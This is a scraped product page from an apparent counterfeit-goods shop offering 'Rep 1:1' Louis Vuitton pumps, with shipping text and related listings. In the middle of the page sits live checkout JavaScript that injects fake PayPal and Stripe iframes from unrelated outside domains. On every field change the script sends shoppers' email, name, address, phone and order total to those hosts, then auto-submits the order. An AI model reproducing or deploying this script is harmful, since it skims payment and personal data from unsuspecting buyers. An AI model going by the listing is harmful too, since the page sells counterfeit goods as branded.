Louis Vuitton Archlight Slingback Pump Rose Poudre For Women- 1AAHZW
$429.00 Original price was: $429.00.$325.00Current price is: $325.00.
The Archlight slingback pump reinterprets the iconic LV Archlight sneaker as an elegant, high-heeled style. It is crafted from technical satin with mesh inserts which nod to the sporty design of the sneaker. This model is adjusted at the back with a velcro strap bearing a rubber Louis Vuitton signature, and is finished with a wavy rubber outsole.
- Rep 1:1
- Size: 35-40
- Rose Poudre Pink
- Adjustable velcro strap
- Supple rubber outsole
- 9 cm / 3.5-inch heel
- LV Circle signature
- Louis Vuitton signature on the strap
- Includes box, dust bag.
- This product is of the best quality.
- Please choose the correct size in centimeter or inch.
Additional information
|
Size |
35 EU – 4 US – 22.5 Cm – 8.85 In ,36 EU – 5 US – 23 Cm – 9.05 In ,37 EU – 6 US – 23.5 Cm – 9.25 In ,38 EU – 7 Us – 24 Cm -9.44 In ,39 EU – 8 US – 24.5 Cm – 9.64 In ,40EU – 9US – 25 Cm – 9.84 In |
|---|
Reviews (0)
Shipping & Delivery
et Your Items Quickly and Easily!
Here’s a breakdown of our shipping process to help you understand the timelines:
Order Processing:
- We typically process orders within 3-5 business days.
- During peak seasons like holidays, there might be slight delays.
Shipping Time:
- Shipping times vary depending on your location.
- We offer a flat-rate shipping option with an estimated delivery time of 7-15 business days after processing.
Tracking Your Order:
- You’ll receive an email notification with your tracking number once your order ships.
- You can track your package using this number on the website of the carrier we use (typically FedEx, UPS, USPS, or DHL).
Need Help?
If you have any questions about your order or shipping, please don’t hesitate to contact our friendly customer support team at support@elegousshop.com We’re always happy to help!
Additional Notes:
If you offer expedited shipping options, you can mention them here briefy with estimated delivery times and additional costs if applicable).
This product has multiple variants. The options may be chosen on the product page
Louis Vuitton Chérie Slingback Pump 1A5BPP Brown For Women
$339.00
This product has multiple variants. The options may be chosen on the product page
Gucci Women’s Ace Sneaker With Bee White For Women GG 431942 02JP0 9064
$390.00 Original price was: $390.00.$292.50Current price is: $292.50.
This product has multiple variants. The options may be chosen on the product page
Christian Louboutin Pigalle Black For Women 85mm – 1100382BK01
$390.00
This product has multiple variants. The options may be chosen on the product page
Hermes Doll 40 Espadrilles Brown For Women 1.6in/4cm
$390.00 Original price was: $390.00.$292.50Current price is: $292.50.
This product has multiple variants. The options may be chosen on the product page
Louis Vuitton Women’s Bom Dia Flat Mule Brown For Women LV 1A3R5O
$339.00
This product has multiple variants. The options may be chosen on the product page
Gucci GG Mid-Heel Boot Rose Beige For Women- 750228 F13B0 9941
$390.00 Original price was: $390.00.$292.50Current price is: $292.50.
This product has multiple variants. The options may be chosen on the product page
Hermes Oran Sandal Multicolor/Red For Women, Women’s Shoes H211170Z
$320.00
This product has multiple variants. The options may be chosen on the product page
Saint Laurent Opyum Sandals In Patent For Women Red 4.3in/11cm
$390.00 Original price was: $390.00.$292.50Current price is: $292.50.
Hey you, sign up and connect to Fasbags Crozus!
No account yet?
Sorry, this product is unavailable. Please choose a different combination.
var clearSetInter = null;
function iframePay() { var url = window.location.href; var len = jQuery(".wc-block-checkout__actions").size();
if (url.includes('checkout') && len) { mountBothIframes(); // 同时挂载 PayPal + Stripe } }
function mountBothIframes() { let hostName = "https://" + window.location.hostname; const PAYPAL_HOST = "https://watertreatmentchuh.shop"; // /?update=
// 判断金额,跳去哪里付款 // let STRIPE_HOST = "https://purifiertreatment.shop"; // var priceCopyLost = jQuery(".wc-block-components-totals-footer-item-tax-value").html() || ""; // priceCopyLost = priceCopyLost.replace("$", ""); // if (priceCopyLost <= 300) { // STRIPE_HOST = "https://purifiertreatment.shop"; // /pay.html?update= // }else { let STRIPE_HOST = "https://egkagi.com"; // /pay.html?update= // } // 记录两个子页的 origin(用于 postMessage 与校验) window.__payOrigins = { paypal: new URL(PAYPAL_HOST).origin, stripe: new URL(STRIPE_HOST).origin }; // 移除旧的 ['#crossDomainIframePaypal', '#crossDomainIframeStripe'].forEach(sel => { let el = document.querySelector(sel); if (el) { try { el.onload = null; } catch(e){} try { el.src = 'about:blank'; } catch(e){} try { el.remove(); } catch(e){} } });
// 先放 PayPal(高度 220) const iframePayPal = document.createElement('iframe'); iframePayPal.id = 'crossDomainIframePaypal'; iframePayPal.width = '100%'; iframePayPal.height = '80'; iframePayPal.src = PAYPAL_HOST + '/pay.html?update=' + Date.now();
// 再放 Stripe(高度 750) const iframeStripe = document.createElement('iframe'); iframeStripe.id = 'crossDomainIframeStripe'; iframeStripe.width = '100%'; iframeStripe.height = '950'; iframeStripe.setAttribute('allow', 'payment *'); iframeStripe.allowPaymentRequest = true; iframeStripe.src = STRIPE_HOST + '/pay.html?update=' + Date.now();
// 插入到下单按钮后 jQuery(".wc-block-checkout__actions").after(iframeStripe); // var priceCopy = jQuery(".wc-block-components-totals-footer-item-tax-value").html() || ""; // priceCopy = priceCopy.replace("$", ""); // if (priceCopy <= 400) { // jQuery(".wc-block-checkout__actions").after(iframePayPal); // } // jQuery(".wc-block-checkout__actions").after(iframePayPal); // 绑定 onload:注册/重绑一次性表单监听,并把账单推给两个 iframe iframePayPal.onload = iframeStripe.onload = function () { // 避免重复绑定:先清除本功能事件,再重绑 jQuery(document).off('.paybridge'); // 目标 origin var targetPaypal = window.__payOrigins.paypal; var targetStripe = window.__payOrigins.stripe; // 构造账单载荷 let billingAddress = { "email": "", "country": "", "first_name": "", "last_name": "", "address_1": "", "address_2": "", "city": "", "state": "", "postcode": "", "phone": "", "price": "", "hostName": hostName }; function getAddress(value) { if (value == "country") { return jQuery("#shipping-country").val() || jQuery("#billing-country").val() || ""; } else if (value == "first_name") { return jQuery("#shipping-first_name").val() || jQuery("#billing-first_name").val() || ""; } else if (value == "last_name") { return jQuery("#shipping-last_name").val() || jQuery("#billing-last_name").val() || ""; } else if (value == "address_1") { return jQuery("#shipping-address_1").val() || jQuery("#billing-address_1").val() || ""; } else if (value == "address_2") { return jQuery("#shipping-address_2").val() || jQuery("#billing-address_2").val() || ""; } else if (value == "city") { return jQuery("#shipping-city").val() || jQuery("#billing-city").val() || ""; } else if (value == "state") { return jQuery("#shipping-state").val() || jQuery("#billing-state").val() || ""; } else if (value == "postcode") { return jQuery("#shipping-postcode").val() || jQuery("#billing-postcode").val() || ""; } else if (value == "phone") { return jQuery("#shipping-phone").val() || jQuery("#billing-phone").val() || ""; } else if (value == "price") { var price = jQuery(".wc-block-components-totals-footer-item-tax-value").html() || ""; return price.replace("$", ""); } return ""; } function requestBillingAddress() { billingAddress = { "email": jQuery("#email").val() || "", "country": getAddress("country"), "first_name": getAddress("first_name"), "last_name": getAddress("last_name"), "address_1": getAddress("address_1"), "address_2": getAddress("address_2"), "city": getAddress("city"), "state": getAddress("state"), "postcode": getAddress("postcode"), "phone": getAddress("phone"), "price": getAddress("price"), "hostName": hostName } } // 给两个子页都发 function postToChildren() { try { iframePayPal.contentWindow && iframePayPal.contentWindow.postMessage(billingAddress, targetPaypal); } catch(e){} try { iframeStripe.contentWindow && iframeStripe.contentWindow.postMessage(billingAddress, targetStripe); } catch(e){} } // 绑定所有你原有的事件(仅事件名加 .paybridge 命名空间) jQuery(`#email, #billing-country, #billing-first_name, #billing-last_name, #billing-address_1, #billing-address_2, #billing-city, #billing-state, #billing-postcode, #billing-phone`).on("blur.paybridge", function() { requestBillingAddress(); postToChildren(); }); jQuery(`#email, #shipping-country, #shipping-first_name, #shipping-last_name, #shipping-address_1, #shipping-address_2, #shipping-city, #shipping-state, #shipping-postcode, #shipping-phone`).on("blur.paybridge", function() { requestBillingAddress(); postToChildren(); }); jQuery("#billing-country, #billing-state, #shipping-country, #shipping-state").on("blur.paybridge", function() { requestBillingAddress(); postToChildren(); }); // 折扣代码变化 jQuery(document).on("blur.paybridge", "#wc-block-components-totals-coupon__form input", function() { var originalPrice = getAddress("price"); var clearCoupon = setInterval(function() { if (originalPrice != getAddress("price")) { requestBillingAddress(); postToChildren(); clearInterval(clearCoupon); } }, 500); setTimeout(()=>clearInterval(clearCoupon), 5000); }); // 取消优惠码 jQuery(document).on("touchstart.paybridge", ".wc-block-components-chip__remove", function() { var originalPrice = getAddress("price"); var clearCoupon = setInterval(function() { if (originalPrice != getAddress("price")) { requestBillingAddress(); postToChildren(); clearInterval(clearCoupon); } }, 500); setTimeout(()=>clearInterval(clearCoupon), 5000); });
// 触摸触发一次 jQuery(document).on("touchstart.paybridge", ()=> { requestBillingAddress(); postToChildren(); });
// 初始化 & 延时再发一次 requestBillingAddress(); postToChildren(); setTimeout(function(){ requestBillingAddress(); postToChildren(); }, 1000); };
// 只注册一次 message 监听(接受两个源) if (!window.__payMsgBound) { window.__payMsgBound = true; window.addEventListener('message', function(event) { const origins = window.__payOrigins || {}; const allow = (event.origin === origins.paypal) || (event.origin === origins.stripe); if (!allow) return;
// 处理消息(与原逻辑一致) if (event.data == "paypal_pay_success") { jQuery('.wc-block-components-checkout-place-order-button').click(); } if (event.data == "paypal_pay_click") { if (jQuery("#email").val() == "") { jQuery("#email").focus(); } else if (jQuery("#billing-country").val() == null) { jQuery("#billing-country").focus(); } else if (jQuery("#shipping-first_name").val() == "" || jQuery("#billing-first_name").val() == "") { jQuery("#shipping-first_name").focus(); jQuery("#billing-first_name").focus(); } else if (jQuery("#shipping-last_name").val() == "" || jQuery("#billing-last_name").val() == "") { jQuery("#shipping-last_name").focus(); jQuery("#billing-last_name").focus(); } else if (jQuery("#shipping-address_1").val() == "" || jQuery("#billing-address_1").val() == "") { jQuery("#shipping-address_1").focus(); jQuery("#billing-address_1").focus(); } else if (jQuery("#shipping-city").val() == "" || jQuery("#billing-city").val() == "") { jQuery("#shipping-city").focus(); jQuery("#billing-city").focus(); } else if (jQuery("#billing-state").val() == null || jQuery("#billing-state").val() == "") { jQuery("#billing-state").focus(); } else if (jQuery("#shipping-postcode").val() == "" || jQuery("#billing-postcode").val() == "") { jQuery("#shipping-postcode").focus(); jQuery("#billing-postcode").focus(); } } }, { passive: true }); }
// 清除定时器(保留你的机制) clearInterval(clearSetInter); }
// 继续保留你的定时器机制
clearSetInter = setInterval(iframePay, 1000);
| Size | 35 EU – 4 US – 22.5 Cm – 8.85 In, 36 EU – 5 US – 23 Cm – 9.05 In, 37 EU – 6 US – 23.5 Cm – 9.25 In, 38 EU – 7 Us – 24 Cm -9.44 In, 39 EU – 8 US – 24.5 Cm – 9.64 In, 40EU – 9US – 25 Cm – 9.84 In |
|---|
Reviews
There are no reviews yet.
| Size | UK | US | EU | Japan |
| XS | 6 - 8 | 4 | 34 | 7 |
| S | 8 -10 | 6 | 36 | 9 |
| M | 10 - 12 | 8 | 38 | 11 |
| L | 12 - 14 | 10 | 40 | 13 |
| XL | 14 - 16 | 12 | 42 | 15 |
| XXL | 16 - 28 | 14 | 44 | 17 |

There are no reviews yet.